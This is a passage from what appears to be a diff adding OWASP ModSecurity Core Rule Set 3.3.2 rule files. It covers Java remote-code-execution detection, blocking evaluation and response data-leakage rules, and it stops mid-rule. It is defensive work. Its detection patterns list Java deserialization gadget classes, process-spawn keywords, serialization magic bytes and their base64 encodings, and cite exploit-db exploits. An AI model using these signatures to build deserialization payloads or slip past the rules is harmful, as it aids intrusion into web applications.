# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ]
# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ]
# [ Java deserialization vulnerability/Apache Struts (CVE-2017-9805) ]
# [ Java deserialization vulnerability/Oracle Weblogic (CVE-2017-10271) ]
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
# Generic rule to detect processbuilder or runtime calls, if any of those is found and the same target contains
# java. unmarshaller or base64data to trigger a potential payload execution
# tested with https://www.exploit-db.com/exploits/42627/ and https://www.exploit-db.com/exploits/43458/
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
"@rx (?:runtime|processbuilder)" \
"id:944110,\
phase:2,\
block,\
t:none,t:lowercase,\
log,\
msg:'Remote Command Execution: Java process spawn (CVE-2017-9805)',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/1',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \
"setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
# Magic bytes detected and payload included possibly RCE vulnerable classes detected and process execution methods detected
# anomaly score set to critical as all conditions indicate the request try to perform RCE.
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
"@rx (?:clonetransformer|forclosure|instantiatefactory|instantiatetransformer|invokertransformer|prototypeclonefactory|prototypeserializationfactory|whileclosure|getproperty|filewriter|xmldecoder)" \
"id:944120,\
phase:2,\
block,\
t:none,t:lowercase,\
log,\
msg:'Remote Command Execution: Java serialization (CVE-2015-4852)',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/1',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \
"t:none,t:lowercase,\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
# This rule is also triggered by the following exploit(s):
# [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/mazen160/struts-pwn ]
# [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/xsscx/cve-2017-5638 ]
# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ]
# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ]
# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ]
# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45260 ]
#
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_FILENAME|REQUEST_HEADERS|XML:/*|XML://@* \
"@pmFromFile java-classes.data" \
"id:944130,\
phase:2,\
block,\
t:none,t:lowercase,\
log,\
msg:'Suspicious Java class detected',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/1',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
# [ Java deserialization vulnerability/Apache Commons (CVE-2015-4852) ]
#
# Detect exploitation of "Java deserialization" Apache Commons.
#
# Based on rules by @spartantri.
# https://spartantri.com/ModSecurity/?p=44
#
# Interesting references about the vulnerability
# https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
# https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
#
# Potential false positives with random fields, the anomaly level is set low to avoid blocking request
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
"@rx \xac\xed\x00\x05" \
"id:944200,\
phase:2,\
block,\
log,\
msg:'Magic bytes Detected, probable java serialization in use',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
# Detecting possible base64 text to match encoded magic bytes \xac\xed\x00\x05 with padding encoded in base64 strings are rO0ABQ KztAAU Cs7QAF
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
"@rx (?:rO0ABQ|KztAAU|Cs7QAF)" \
"id:944210,\
phase:2,\
block,\
log,\
msg:'Magic bytes Detected Base64 Encoded, probable java serialization in use',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
"@rx (?:clonetransformer|forclosure|instantiatefactory|instantiatetransformer|invokertransformer|prototypeclonefactory|prototypeserializationfactory|whileclosure|getproperty|filewriter|xmldecoder)" \
"id:944240,\
phase:2,\
block,\
t:none,t:lowercase,\
log,\
msg:'Remote Command Execution: Java serialization (CVE-2015-4852)',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
# This rule is also triggered by the following exploit(s):
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
"@rx java\b.+(?:runtime|processbuilder)" \
"id:944250,\
phase:2,\
block,\
t:lowercase,\
log,\
msg:'Remote Command Execution: Suspicious Java method detected',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
# Interesting keywords for possibly RCE on vulnerable classes and methods base64 encoded
# Keywords = ['runtime', 'processbuilder', 'clonetransformer', 'forclosure', 'instantiatefactory', 'instantiatetransformer', 'invokertransformer', 'prototypeclonefactory', 'prototypeserializationfactory', 'whileclosure']
#for item in keywords:
# pad='\x00'
# for padding in xrange(3):
# print base64.b64encode(''.join([pad*padding,item])).replace('=','')[padding:],
#cnVudGltZQ HJ1bnRpbWU BydW50aW1l cHJvY2Vzc2J1aWxkZXI HByb2Nlc3NidWlsZGVy Bwcm9jZXNzYnVpbGRlcg Y2xvbmV0cmFuc2Zvcm1lcg GNsb25ldHJhbnNmb3JtZXI BjbG9uZXRyYW5zZm9ybWVy Zm9yY2xvc3VyZQ GZvcmNsb3N1cmU Bmb3JjbG9zdXJl aW5zdGFudGlhdGVmYWN0b3J5 Gluc3RhbnRpYXRlZmFjdG9yeQ BpbnN0YW50aWF0ZWZhY3Rvcnk aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg Gluc3RhbnRpYXRldHJhbnNmb3JtZXI BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy aW52b2tlcnRyYW5zZm9ybWVy Gludm9rZXJ0cmFuc2Zvcm1lcg BpbnZva2VydHJhbnNmb3JtZXI cHJvdG90eXBlY2xvbmVmYWN0b3J5 HByb3RvdHlwZWNsb25lZmFjdG9yeQ Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ d2hpbGVjbG9zdXJl HdoaWxlY2xvc3VyZQ B3aGlsZWNsb3N1cmU
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \
"@rx (?:cnVudGltZQ|HJ1bnRpbWU|BydW50aW1l|cHJvY2Vzc2J1aWxkZXI|HByb2Nlc3NidWlsZGVy|Bwcm9jZXNzYnVpbGRlcg|Y2xvbmV0cmFuc2Zvcm1lcg|GNsb25ldHJhbnNmb3JtZXI|BjbG9uZXRyYW5zZm9ybWVy|Zm9yY2xvc3VyZQ|GZvcmNsb3N1cmU|Bmb3JjbG9zdXJl|aW5zdGFudGlhdGVmYWN0b3J5|Gluc3RhbnRpYXRlZmFjdG9yeQ|BpbnN0YW50aWF0ZWZhY3Rvcnk|aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg|Gluc3RhbnRpYXRldHJhbnNmb3JtZXI|BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy|aW52b2tlcnRyYW5zZm9ybWVy|Gludm9rZXJ0cmFuc2Zvcm1lcg|BpbnZva2VydHJhbnNmb3JtZXI|cHJvdG90eXBlY2xvbmVmYWN0b3J5|HByb3RvdHlwZWNsb25lZmFjdG9yeQ|Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk|cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk|HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5|Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ|d2hpbGVjbG9zdXJl|HdoaWxlY2xvc3VyZQ|B3aGlsZWNsb3N1cmU)" \
"id:944300,\
phase:2,\
block,\
t:none,\
log,\
msg:'Base64 encoded string matched suspicious keyword',\
logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
tag:'application-multi',\
tag:'language-java',\
tag:'platform-multi',\
tag:'attack-rce',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248',\
tag:'PCI/6.5.2',\
tag:'paranoia-level/3',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:944017,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:944018,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-944-APPLICATION-ATTACK-JAVA"

132
core/modsecurity/files/coreruleset/rules/REQUEST-949-BLOCKING-EVALUATION.conf Normal file
View File

@@ -0,0 +1,132 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
# Summing up the anomaly score.
# NOTE: tx.anomaly_score should not be set initially, but masking would lead to difficult bugs.
# So we add to it.
SecRule TX:PARANOIA_LEVEL "@ge 1" \
"id:949060,\
phase:2,\
pass,\
t:none,\
nolog,\
setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl1}'"
SecRule TX:PARANOIA_LEVEL "@ge 2" \
"id:949061,\
phase:2,\
pass,\
t:none,\
nolog,\
setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl2}'"
SecRule TX:PARANOIA_LEVEL "@ge 3" \
"id:949062,\
phase:2,\
pass,\
t:none,\
nolog,\
setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl3}'"
SecRule TX:PARANOIA_LEVEL "@ge 4" \
"id:949063,\
phase:2,\
pass,\
t:none,\
nolog,\
setvar:'tx.anomaly_score=+%{tx.anomaly_score_pl4}'"
SecMarker "BEGIN-REQUEST-BLOCKING-EVAL"
# These rules use the anomaly score settings specified in the 10 config file.
# You should also set the desired disruptive action (deny, redirect, etc...).
#
# -=[ IP Reputation Checks ]=-
#
# Block based on variable IP.REPUT_BLOCK_FLAG and TX.DO_REPUT_BLOCK
#
SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \
"id:949100,\
phase:2,\
deny,\
log,\
msg:'Request Denied by IP Reputation Enforcement',\
logdata:'Previous Block Reason: %{ip.reput_block_reason}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule TX:DO_REPUT_BLOCK "@eq 1" \
"setvar:'tx.inbound_anomaly_score=%{tx.anomaly_score}'"
#
# -=[ Anomaly Mode: Overall Transaction Anomaly Score ]=-
#
SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \
"id:949110,\
phase:2,\
deny,\
t:none,\
log,\
msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.ANOMALY_SCORE})',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-generic',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.inbound_anomaly_score=%{tx.anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,skipAfter:END-REQUEST-949-BLOCKING-EVALUATION"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-949-BLOCKING-EVALUATION"

139
core/modsecurity/files/coreruleset/rules/RESPONSE-950-DATA-LEAKAGES.conf Normal file
View File

@@ -0,0 +1,139 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
# The paranoia level skip rules 950020, 950021 and 950022 have odd
# numbers not in sync with other paranoia level skip rules in other
# files. This is done to avoid rule id collisions with CRSv2.
# This is also true for rule 950130.
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:950020,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:950021,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ Directory Listing ]=-
#
SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?<H|title>Index of.*?<h)1>Index of|>\[To Parent Directory\]<\/[Aa]><br>)" \
"id:950130,\
phase:4,\
block,\
capture,\
t:none,\
msg:'Directory Listing',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54/127',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
#
# -=[ CGI Source Code Leakage ]=-
#
# A CGI script begins normally with #! and the interpreter,
# for example:
#
# #!/usr/bin/perl
# #!/usr/bin/python
# #!/usr/bin/ruby
#
# If the CGI script processors or MIME type handlers are misconfigured,
# the script's source code could be erroneously returned to the client.
SecRule RESPONSE_BODY "@rx ^#\!\s?/" \
"id:950140,\
phase:4,\
block,\
capture,\
t:none,\
msg:'CGI source code leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116',\
tag:'PCI/6.5.6',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:950013,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:950014,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
#
# -=[ The application is not available - 5xx level status code ]=-
#
SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \
"id:950100,\
phase:4,\
block,\
capture,\
t:none,\
msg:'The Application Returned a 500-Level Status Code',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'PCI/6.5.6',\
tag:'paranoia-level/2',\
tag:'OWASP_CRS',\
tag:'capec/1000/152',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'ERROR',\
setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.error_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:950015,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:950016,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:950017,phase:3,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:950022,phase:4,pass,nolog,skipAfter:END-RESPONSE-950-DATA-LEAKAGES"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-RESPONSE-950-DATA-LEAKAGES"

476
core/modsecurity/files/coreruleset/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf Normal file
View File

@@ -0,0 +1,476 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:951011,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:951012,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ SQL Error Leakages ]=-
#
# Ref: https://raw.github.com/sqlmapproject/sqlmap/master/xml/errors.xml
# Ref: https://github.com/Arachni/arachni/tree/master/components/checks/active/sql_injection/regexps
#
SecRule RESPONSE_BODY "@pmFromFile sql-errors.data" \
"id:951100,\
phase:4,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.sql_error_match=1'"
SecRule TX:sql_error_match "@eq 1" \
"id:951110,\
phase:4,\
block,\
capture,\
t:none,\
msg:'Microsoft Access SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-msaccess',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951120,\
phase:4,\
block,\
capture,\
t:none,\
msg:'Oracle SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-oracle',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|Oracle error|Oracle.*Driver|Warning.*oci_.*|Warning.*ora_.*)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951130,\
phase:4,\
block,\
capture,\
t:none,\
msg:'DB2 SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-db2',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|CLI Driver.*DB2|DB2 SQL error|db2_\w+\()" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951140,\
phase:4,\
block,\
capture,\
t:none,\
msg:'EMC SQL Information Leakage',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-emc',\
tag:'attack-disclosure',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/116/54',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinity of:)" \
"capture,\
setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:sql_error_match "@eq 1" \
"id:951150,\
phase:4,\
block,\
capture,\
t:none,\
